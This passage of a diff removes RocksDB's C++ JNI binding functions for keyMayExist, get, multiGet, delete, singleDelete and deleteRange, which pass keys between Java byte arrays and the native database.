-      nullptr, jkey, jkey_off, jkey_len, jstring_builder, &has_exception);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    keyMayExist
- * Signature: (JJ[BIIJLjava/lang/StringBuilder;)Z
- */
-jboolean Java_org_rocksdb_RocksDB_keyMayExist__JJ_3BIIJLjava_lang_StringBuilder_2(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jread_options_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len, jlong jcf_handle,
-    jobject jstring_builder) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto& read_options = *reinterpret_cast<rocksdb::ReadOptions*>(
-      jread_options_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(
-      jcf_handle);
-  if (cf_handle != nullptr) {
-    bool has_exception = false;
-    return key_may_exist_helper(env, db, read_options, cf_handle,
-        jkey, jkey_off, jkey_len, jstring_builder, &has_exception);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-    return true;
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::Get
-
-jbyteArray rocksdb_get_helper(
-    JNIEnv* env, rocksdb::DB* db, const rocksdb::ReadOptions& read_opt,
-    rocksdb::ColumnFamilyHandle* column_family_handle, jbyteArray jkey,
-    jint jkey_off, jint jkey_len) {
-
-  jbyte* key = new jbyte[jkey_len];
-  env->GetByteArrayRegion(jkey, jkey_off, jkey_len, key);
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    delete [] key;
-    return nullptr;
-  }
-
-  rocksdb::Slice key_slice(
-      reinterpret_cast<char*>(key), jkey_len);
-
-  std::string value;
-  rocksdb::Status s;
-  if (column_family_handle != nullptr) {
-    s = db->Get(read_opt, column_family_handle, key_slice, &value);
-  } else {
-    // backwards compatibility
-    s = db->Get(read_opt, key_slice, &value);
-  }
-
-  // cleanup
-  delete [] key;
-
-  if (s.IsNotFound()) {
-    return nullptr;
-  }
-
-  if (s.ok()) {
-    jbyteArray jret_value = rocksdb::JniUtil::copyBytes(env, value);
-    if(jret_value == nullptr) {
-      // exception occurred
-      return nullptr;
-    }
-    return jret_value;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  return nullptr;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    get
- * Signature: (J[BII)[B
- */
-jbyteArray Java_org_rocksdb_RocksDB_get__J_3BII(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len) {
-  return rocksdb_get_helper(env,
-      reinterpret_cast<rocksdb::DB*>(jdb_handle),
-      rocksdb::ReadOptions(), nullptr,
-      jkey, jkey_off, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    get
- * Signature: (J[BIIJ)[B
- */
-jbyteArray Java_org_rocksdb_RocksDB_get__J_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len, jlong jcf_handle) {
-  auto db_handle = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    return rocksdb_get_helper(env, db_handle, rocksdb::ReadOptions(),
-        cf_handle, jkey, jkey_off, jkey_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-    return nullptr;
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    get
- * Signature: (JJ[BII)[B
- */
-jbyteArray Java_org_rocksdb_RocksDB_get__JJ_3BII(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jropt_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len) {
-  return rocksdb_get_helper(env,
-      reinterpret_cast<rocksdb::DB*>(jdb_handle),
-      *reinterpret_cast<rocksdb::ReadOptions*>(jropt_handle), nullptr,
-      jkey, jkey_off, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    get
- * Signature: (JJ[BIIJ)[B
- */
-jbyteArray Java_org_rocksdb_RocksDB_get__JJ_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jropt_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len, jlong jcf_handle) {
-  auto* db_handle = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto& ro_opt = *reinterpret_cast<rocksdb::ReadOptions*>(jropt_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    return rocksdb_get_helper(env, db_handle, ro_opt, cf_handle,
-        jkey, jkey_off, jkey_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-    return nullptr;
-  }
-}
-
-jint rocksdb_get_helper(JNIEnv* env, rocksdb::DB* db,
-                        const rocksdb::ReadOptions& read_options,
-                        rocksdb::ColumnFamilyHandle* column_family_handle,
-                        jbyteArray jkey, jint jkey_off, jint jkey_len,
-                        jbyteArray jval, jint jval_off, jint jval_len,
-                        bool* has_exception) {
-  static const int kNotFound = -1;
-  static const int kStatusError = -2;
-
-  jbyte* key = new jbyte[jkey_len];
-  env->GetByteArrayRegion(jkey, jkey_off, jkey_len, key);
-  if(env->ExceptionCheck()) {
-    // exception thrown: OutOfMemoryError
-    delete [] key;
-    *has_exception = true;
-    return kStatusError;
-  }
-  rocksdb::Slice key_slice(reinterpret_cast<char*>(key), jkey_len);
-
-  // TODO(yhchiang): we might save one memory allocation here by adding
-  // a DB::Get() function which takes preallocated jbyte* as input.
-  std::string cvalue;
-  rocksdb::Status s;
-  if (column_family_handle != nullptr) {
-    s = db->Get(read_options, column_family_handle, key_slice, &cvalue);
-  } else {
-    // backwards compatibility
-    s = db->Get(read_options, key_slice, &cvalue);
-  }
-
-  // cleanup
-  delete [] key;
-
-  if (s.IsNotFound()) {
-    *has_exception = false;
-    return kNotFound;
-  } else if (!s.ok()) {
-    *has_exception = true;
-    // Here since we are throwing a Java exception from c++ side.
-    // As a result, c++ does not know calling this function will in fact
-    // throwing an exception.  As a result, the execution flow will
-    // not stop here, and codes after this throw will still be
-    // executed.
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-
-    // Return a dummy const value to avoid compilation error, although
-    // java side might not have a chance to get the return value :)
-    return kStatusError;
-  }
-
-  const jint cvalue_len = static_cast<jint>(cvalue.size());
-  const jint length = std::min(jval_len, cvalue_len);
-
-  env->SetByteArrayRegion(jval, jval_off, length,
-                          const_cast<jbyte*>(reinterpret_cast<const jbyte*>(cvalue.c_str())));
-  if(env->ExceptionCheck()) {
-    // exception thrown: OutOfMemoryError
-    *has_exception = true;
-    return kStatusError;
-  }
-
-  *has_exception = false;
-  return cvalue_len;
-}
-
-inline void multi_get_helper_release_keys(JNIEnv* env,
-    std::vector<std::pair<jbyte*, jobject>> &keys_to_free) {
-  auto end = keys_to_free.end();
-  for (auto it = keys_to_free.begin(); it != end; ++it) {
-    delete [] it->first;
-    env->DeleteLocalRef(it->second);
-  }
-  keys_to_free.clear();
-}
-
-/**
- * cf multi get
- *
- * @return byte[][] of values or nullptr if an exception occurs
- */
-jobjectArray multi_get_helper(JNIEnv* env, jobject jdb, rocksdb::DB* db,
-    const rocksdb::ReadOptions& rOpt, jobjectArray jkeys,
-    jintArray jkey_offs, jintArray jkey_lens,
-    jlongArray jcolumn_family_handles) {
-  std::vector<rocksdb::ColumnFamilyHandle*> cf_handles;
-  if (jcolumn_family_handles != nullptr) {
-    const jsize len_cols = env->GetArrayLength(jcolumn_family_handles);
-
-    jlong* jcfh = env->GetLongArrayElements(jcolumn_family_handles, nullptr);
-    if(jcfh == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return nullptr;
-    }
-
-    for (jsize i = 0; i < len_cols; i++) {
-      auto* cf_handle =
-          reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcfh[i]);
-      cf_handles.push_back(cf_handle);
-    }
-    env->ReleaseLongArrayElements(jcolumn_family_handles, jcfh, JNI_ABORT);
-  }
-
-  const jsize len_keys = env->GetArrayLength(jkeys);
-  if (env->EnsureLocalCapacity(len_keys) != 0) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-
-  jint* jkey_off = env->GetIntArrayElements(jkey_offs, nullptr);
-  if(jkey_off == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-
-  jint* jkey_len = env->GetIntArrayElements(jkey_lens, nullptr);
-  if(jkey_len == nullptr) {
-    // exception thrown: OutOfMemoryError
-    env->ReleaseIntArrayElements(jkey_offs, jkey_off, JNI_ABORT);
-    return nullptr;
-  }
-
-  std::vector<rocksdb::Slice> keys;
-  std::vector<std::pair<jbyte*, jobject>> keys_to_free;
-  for (jsize i = 0; i < len_keys; i++) {
-    jobject jkey = env->GetObjectArrayElement(jkeys, i);
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->ReleaseIntArrayElements(jkey_lens, jkey_len, JNI_ABORT);
-      env->ReleaseIntArrayElements(jkey_offs, jkey_off, JNI_ABORT);
-      multi_get_helper_release_keys(env, keys_to_free);
-      return nullptr;
-    }
-
-    jbyteArray jkey_ba = reinterpret_cast<jbyteArray>(jkey);
-
-    const jint len_key = jkey_len[i];
-    jbyte* key = new jbyte[len_key];
-    env->GetByteArrayRegion(jkey_ba, jkey_off[i], len_key, key);
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      delete [] key;
-      env->DeleteLocalRef(jkey);
-      env->ReleaseIntArrayElements(jkey_lens, jkey_len, JNI_ABORT);
-      env->ReleaseIntArrayElements(jkey_offs, jkey_off, JNI_ABORT);
-      multi_get_helper_release_keys(env, keys_to_free);
-      return nullptr;
-    }
-
-    rocksdb::Slice key_slice(reinterpret_cast<char*>(key), len_key);
-    keys.push_back(key_slice);
-
-    keys_to_free.push_back(std::pair<jbyte*, jobject>(key, jkey));
-  }
-
-  // cleanup jkey_off and jken_len
-  env->ReleaseIntArrayElements(jkey_lens, jkey_len, JNI_ABORT);
-  env->ReleaseIntArrayElements(jkey_offs, jkey_off, JNI_ABORT);
-
-  std::vector<std::string> values;
-  std::vector<rocksdb::Status> s;
-  if (cf_handles.size() == 0) {
-    s = db->MultiGet(rOpt, keys, &values);
-  } else {
-    s = db->MultiGet(rOpt, cf_handles, keys, &values);
-  }
-
-  // free up allocated byte arrays
-  multi_get_helper_release_keys(env, keys_to_free);
-
-  // prepare the results
-  jobjectArray jresults =
-      rocksdb::ByteJni::new2dByteArray(env, static_cast<jsize>(s.size()));
-  if(jresults == nullptr) {
-    // exception occurred
-    return nullptr;
-  }
-
-  // TODO(AR) it is not clear to me why EnsureLocalCapacity is needed for the
-  //     loop as we cleanup references with env->DeleteLocalRef(jentry_value);
-  if (env->EnsureLocalCapacity(static_cast<jint>(s.size())) != 0) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-  // add to the jresults
-  for (std::vector<rocksdb::Status>::size_type i = 0; i != s.size(); i++) {
-    if (s[i].ok()) {
-      std::string* value = &values[i];
-      const jsize jvalue_len = static_cast<jsize>(value->size());
-      jbyteArray jentry_value = env->NewByteArray(jvalue_len);
-      if(jentry_value == nullptr) {
-        // exception thrown: OutOfMemoryError
-        return nullptr;
-      }
-
-      env->SetByteArrayRegion(jentry_value, 0, static_cast<jsize>(jvalue_len),
-          const_cast<jbyte*>(reinterpret_cast<const jbyte*>(value->c_str())));
-      if(env->ExceptionCheck()) {
-        // exception thrown: ArrayIndexOutOfBoundsException
-        env->DeleteLocalRef(jentry_value);
-        return nullptr;
-      }
-
-      env->SetObjectArrayElement(jresults, static_cast<jsize>(i), jentry_value);
-      if(env->ExceptionCheck()) {
-        // exception thrown: ArrayIndexOutOfBoundsException
-        env->DeleteLocalRef(jentry_value);
-        return nullptr;
-      }
-
-      env->DeleteLocalRef(jentry_value);
-    }
-  }
-
-  return jresults;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    multiGet
- * Signature: (J[[B[I[I)[[B
- */
-jobjectArray Java_org_rocksdb_RocksDB_multiGet__J_3_3B_3I_3I(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jobjectArray jkeys,
-    jintArray jkey_offs, jintArray jkey_lens) {
-  return multi_get_helper(env, jdb, reinterpret_cast<rocksdb::DB*>(jdb_handle),
-      rocksdb::ReadOptions(), jkeys, jkey_offs, jkey_lens, nullptr);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    multiGet
- * Signature: (J[[B[I[I[J)[[B
- */
-jobjectArray Java_org_rocksdb_RocksDB_multiGet__J_3_3B_3I_3I_3J(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jobjectArray jkeys,
-    jintArray jkey_offs, jintArray jkey_lens,
-    jlongArray jcolumn_family_handles) {
-  return multi_get_helper(env, jdb, reinterpret_cast<rocksdb::DB*>(jdb_handle),
-      rocksdb::ReadOptions(), jkeys, jkey_offs, jkey_lens,
-      jcolumn_family_handles);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    multiGet
- * Signature: (JJ[[B[I[I)[[B
- */
-jobjectArray Java_org_rocksdb_RocksDB_multiGet__JJ_3_3B_3I_3I(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jropt_handle,
-    jobjectArray jkeys, jintArray jkey_offs, jintArray jkey_lens) {
-  return multi_get_helper(env, jdb, reinterpret_cast<rocksdb::DB*>(jdb_handle),
-      *reinterpret_cast<rocksdb::ReadOptions*>(jropt_handle), jkeys, jkey_offs,
-      jkey_lens, nullptr);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    multiGet
- * Signature: (JJ[[B[I[I[J)[[B
- */
-jobjectArray Java_org_rocksdb_RocksDB_multiGet__JJ_3_3B_3I_3I_3J(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jropt_handle,
-    jobjectArray jkeys, jintArray jkey_offs, jintArray jkey_lens,
-    jlongArray jcolumn_family_handles) {
-  return multi_get_helper(env, jdb, reinterpret_cast<rocksdb::DB*>(jdb_handle),
-      *reinterpret_cast<rocksdb::ReadOptions*>(jropt_handle), jkeys, jkey_offs,
-      jkey_lens, jcolumn_family_handles);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    get
- * Signature: (J[BII[BII)I
- */
-jint Java_org_rocksdb_RocksDB_get__J_3BII_3BII(JNIEnv* env, jobject jdb,
-                                               jlong jdb_handle,
-                                               jbyteArray jkey, jint jkey_off,
-                                               jint jkey_len, jbyteArray jval,
-                                               jint jval_off, jint jval_len) {
-  bool has_exception = false;
-  return rocksdb_get_helper(env, reinterpret_cast<rocksdb::DB*>(jdb_handle),
-                            rocksdb::ReadOptions(), nullptr, jkey, jkey_off,
-                            jkey_len, jval, jval_off, jval_len,
-                            &has_exception);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    get
- * Signature: (J[BII[BIIJ)I
- */
-jint Java_org_rocksdb_RocksDB_get__J_3BII_3BIIJ(JNIEnv* env, jobject jdb,
-                                                jlong jdb_handle,
-                                                jbyteArray jkey, jint jkey_off,
-                                                jint jkey_len, jbyteArray jval,
-                                                jint jval_off, jint jval_len,
-                                                jlong jcf_handle) {
-  auto* db_handle = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    bool has_exception = false;
-    return rocksdb_get_helper(env, db_handle, rocksdb::ReadOptions(), cf_handle,
-                              jkey, jkey_off, jkey_len, jval, jval_off,
-                              jval_len, &has_exception);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-    // will never be evaluated
-    return 0;
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    get
- * Signature: (JJ[BII[BII)I
- */
-jint Java_org_rocksdb_RocksDB_get__JJ_3BII_3BII(JNIEnv* env, jobject jdb,
-                                                jlong jdb_handle,
-                                                jlong jropt_handle,
-                                                jbyteArray jkey, jint jkey_off,
-                                                jint jkey_len, jbyteArray jval,
-                                                jint jval_off, jint jval_len) {
-  bool has_exception = false;
-  return rocksdb_get_helper(
-      env, reinterpret_cast<rocksdb::DB*>(jdb_handle),
-      *reinterpret_cast<rocksdb::ReadOptions*>(jropt_handle), nullptr, jkey,
-      jkey_off, jkey_len, jval, jval_off, jval_len, &has_exception);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    get
- * Signature: (JJ[BII[BIIJ)I
- */
-jint Java_org_rocksdb_RocksDB_get__JJ_3BII_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jropt_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len, jbyteArray jval,
-    jint jval_off, jint jval_len, jlong jcf_handle) {
-  auto* db_handle = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto& ro_opt = *reinterpret_cast<rocksdb::ReadOptions*>(jropt_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    bool has_exception = false;
-    return rocksdb_get_helper(env, db_handle, ro_opt, cf_handle, jkey, jkey_off,
-                              jkey_len, jval, jval_off, jval_len,
-                              &has_exception);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-    // will never be evaluated
-    return 0;
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::Delete()
-
-/**
- * @return true if the delete succeeded, false if a Java Exception was thrown
- */
-bool rocksdb_delete_helper(
-    JNIEnv* env, rocksdb::DB* db, const rocksdb::WriteOptions& write_options,
-    rocksdb::ColumnFamilyHandle* cf_handle, jbyteArray jkey, jint jkey_off,
-    jint jkey_len) {
-  jbyte* key = new jbyte[jkey_len];
-  env->GetByteArrayRegion(jkey, jkey_off, jkey_len, key);
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    delete [] key;
-    return false;
-  }
-  rocksdb::Slice key_slice(reinterpret_cast<char*>(key), jkey_len);
-
-  rocksdb::Status s;
-  if (cf_handle != nullptr) {
-    s = db->Delete(write_options, cf_handle, key_slice);
-  } else {
-    // backwards compatibility
-    s = db->Delete(write_options, key_slice);
-  }
-
-  // cleanup
-  delete [] key;
-
-  if (s.ok()) {
-    return true;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  return false;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    delete
- * Signature: (J[BII)V
- */
-void Java_org_rocksdb_RocksDB_delete__J_3BII(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-  rocksdb_delete_helper(env, db, default_write_options, nullptr,
-      jkey, jkey_off, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    delete
- * Signature: (J[BIIJ)V
- */
-void Java_org_rocksdb_RocksDB_delete__J_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len, jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_delete_helper(env, db, default_write_options, cf_handle,
-        jkey, jkey_off, jkey_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    delete
- * Signature: (JJ[BII)V
- */
-void Java_org_rocksdb_RocksDB_delete__JJ_3BII(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jlong jwrite_options, jbyteArray jkey, jint jkey_off, jint jkey_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options =
-      reinterpret_cast<rocksdb::WriteOptions*>(jwrite_options);
-  rocksdb_delete_helper(env, db, *write_options, nullptr, jkey, jkey_off,
-      jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    delete
- * Signature: (JJ[BIIJ)V
- */
-void Java_org_rocksdb_RocksDB_delete__JJ_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jlong jwrite_options, jbyteArray jkey, jint jkey_off, jint jkey_len,
-    jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options =
-      reinterpret_cast<rocksdb::WriteOptions*>(jwrite_options);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_delete_helper(env, db, *write_options, cf_handle, jkey, jkey_off,
-        jkey_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::SingleDelete()
-/**
- * @return true if the single delete succeeded, false if a Java Exception
- *     was thrown
- */
-bool rocksdb_single_delete_helper(
-    JNIEnv* env, rocksdb::DB* db, const rocksdb::WriteOptions& write_options,
-    rocksdb::ColumnFamilyHandle* cf_handle, jbyteArray jkey, jint jkey_len) {
-  jbyte* key = env->GetByteArrayElements(jkey, nullptr);
-  if(key == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return false;
-  }
-  rocksdb::Slice key_slice(reinterpret_cast<char*>(key), jkey_len);
-
-  rocksdb::Status s;
-  if (cf_handle != nullptr) {
-    s = db->SingleDelete(write_options, cf_handle, key_slice);
-  } else {
-    // backwards compatibility
-    s = db->SingleDelete(write_options, key_slice);
-  }
-
-  // trigger java unref on key and value.
-  // by passing JNI_ABORT, it will simply release the reference without
-  // copying the result back to the java byte array.
-  env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-
-  if (s.ok()) {
-    return true;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  return false;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    singleDelete
- * Signature: (J[BI)V
- */
-void Java_org_rocksdb_RocksDB_singleDelete__J_3BI(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jbyteArray jkey, jint jkey_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-  rocksdb_single_delete_helper(env, db, default_write_options, nullptr,
-      jkey, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    singleDelete
- * Signature: (J[BIJ)V
- */
-void Java_org_rocksdb_RocksDB_singleDelete__J_3BIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jbyteArray jkey, jint jkey_len, jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_single_delete_helper(env, db, default_write_options, cf_handle,
-        jkey, jkey_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    singleDelete
- * Signature: (JJ[BIJ)V
- */
-void Java_org_rocksdb_RocksDB_singleDelete__JJ_3BI(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jlong jwrite_options, jbyteArray jkey, jint jkey_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options =
-      reinterpret_cast<rocksdb::WriteOptions*>(jwrite_options);
-  rocksdb_single_delete_helper(env, db, *write_options, nullptr, jkey,
-      jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    singleDelete
- * Signature: (JJ[BIJ)V
- */
-void Java_org_rocksdb_RocksDB_singleDelete__JJ_3BIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jlong jwrite_options, jbyteArray jkey, jint jkey_len,
-    jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options =
-      reinterpret_cast<rocksdb::WriteOptions*>(jwrite_options);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_single_delete_helper(env, db, *write_options, cf_handle, jkey,
-        jkey_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::DeleteRange()
-/**
- * @return true if the delete range succeeded, false if a Java Exception
- *     was thrown
- */
-bool rocksdb_delete_range_helper(JNIEnv* env, rocksdb::DB* db,
-                                 const rocksdb::WriteOptions& write_options,
-                                 rocksdb::ColumnFamilyHandle* cf_handle,
-                                 jbyteArray jbegin_key, jint jbegin_key_off,
-                                 jint jbegin_key_len, jbyteArray jend_key,
-                                 jint jend_key_off, jint jend_key_len) {
-  jbyte* begin_key = new jbyte[jbegin_key_len];
-  env->GetByteArrayRegion(jbegin_key, jbegin_key_off, jbegin_key_len,
-                          begin_key);
-  if (env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    delete[] begin_key;
-    return false;
-  }
-  rocksdb::Slice begin_key_slice(reinterpret_cast<char*>(begin_key),
-                                 jbegin_key_len);
-
-  jbyte* end_key = new jbyte[jend_key_len];
-  env->GetByteArrayRegion(jend_key, jend_key_off, jend_key_len, end_key);
-  if (env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    delete[] begin_key;
-    delete[] end_key;
-    return false;
-  }
-  rocksdb::Slice end_key_slice(reinterpret_cast<char*>(end_key), jend_key_len);
-
-  rocksdb::Status s =
-      db->DeleteRange(write_options, cf_handle, begin_key_slice, end_key_slice);
-
-  // cleanup
-  delete[] begin_key;
-  delete[] end_key;
-
-  if (s.ok()) {
-    return true;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  return false;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    deleteRange
- * Signature: (J[BII[BII)V
- */
-void Java_org_rocksdb_RocksDB_deleteRange__J_3BII_3BII(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jbyteArray jbegin_key,
-    jint jbegin_key_off, jint jbegin_key_len, jbyteArray jend_key,
-    jint jend_key_off, jint jend_key_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-  rocksdb_delete_range_helper(env, db, default_write_options, nullptr,
-                              jbegin_key, jbegin_key_off, jbegin_key_len,
-                              jend_key, jend_key_off, jend_key_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    deleteRange
- * Signature: (J[BII[BIIJ)V
- */
-void Java_org_rocksdb_RocksDB_deleteRange__J_3BII_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jbyteArray jbegin_key,
-    jint jbegin_key_off, jint jbegin_key_len, jbyteArray jend_key,
-    jint jend_key_off, jint jend_key_len, jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_delete_range_helper(env, db, default_write_options, cf_handle,
-                                jbegin_key, jbegin_key_off, jbegin_key_len,
-                                jend_key, jend_key_off, jend_key_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(
-        env, rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    deleteRange
- * Signature: (JJ[BII[BII)V
- */
-void Java_org_rocksdb_RocksDB_deleteRange__JJ_3BII_3BII(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jwrite_options,
-    jbyteArray jbegin_key, jint jbegin_key_off, jint jbegin_key_len,
-    jbyteArray jend_key, jint jend_key_off, jint jend_key_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options =
-      reinterpret_cast<rocksdb::WriteOptions*>(jwrite_options);
-  rocksdb_delete_range_helper(env, db, *write_options, nullptr, jbegin_key,
-                              jbegin_key_off, jbegin_key_len, jend_key,
